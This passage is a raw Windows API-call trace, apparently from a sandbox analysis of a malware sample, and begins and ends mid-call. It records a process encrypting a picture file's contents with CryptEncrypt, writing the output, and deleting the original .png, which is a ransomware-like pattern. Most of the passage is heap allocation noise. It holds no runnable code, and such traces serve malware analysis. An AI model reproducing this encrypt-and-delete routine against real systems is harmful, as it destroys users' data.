pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0093.488] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.489] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.489] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0093.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0093.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0093.490] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.490] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.490] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.490] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x4ac0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x4ad0) returned 1 [0093.491] CharLowerBuffW (in: lpsz="byte[19153]", cchLength=0xb | out: lpsz="byte[19153]") returned 0xb [0093.491] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.491] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4524068*, pdwDataLen=0x144e538*=0x4ac0, dwBufLen=0x4ad0 | out: pbData=0x4524068*, pdwDataLen=0x144e538*=0x4ad0) returned 1 [0093.491] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.536] WriteFile (in: hFile=0x298, lpBuffer=0x453b6b0*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x453b6b0*, lpNumberOfBytesWritten=0x144ef3c*=0x4ad0, lpOverlapped=0x0) returned 1 [0093.537] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0093.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0093.538] CryptDestroyKey (hKey=0x41ac700) returned 1 [0093.538] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.538] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0093.538] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0093.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.538] FreeLibrary (hLibModule=0x756e0000) returned 1 [0093.538] CloseHandle (hObject=0x258) returned 1 [0093.539] CloseHandle (hObject=0x298) returned 1 [0093.544] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png", lpFilePart=0x0) returned 0x2f [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0093.544] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\bflicpkmqtp.png")) returned 0x20 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0093.545] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa782600, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x58d6c440, ftLastAccessTime.dwHighDateTime=0x1d5ee97, ftLastWriteTime.dwLowDateTime=0x58d6c440, ftLastWriteTime.dwHighDateTime=0x1d5ee97, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bflIcpkmQtP.png", cAlternateFileName="BFLICP~1.PNG")) returned 0x41ac2c0 [0093.545] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\bflicpkmqtp.png")) returned 1 [0093.585] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa782600, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x58d6c440, ftLastAccessTime.dwHighDateTime=0x1d5ee97, ftLastWriteTime.dwLowDateTime=0x58d6c440, ftLastWriteTime.dwHighDateTime=0x1d5ee97, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bflIcpkmQtP.png", cAlternateFileName="BFLICP~1.PNG")) returned 0 [0093.585] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.586] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0093.586] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0093.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0093.587] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.587] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.587] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0093.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, 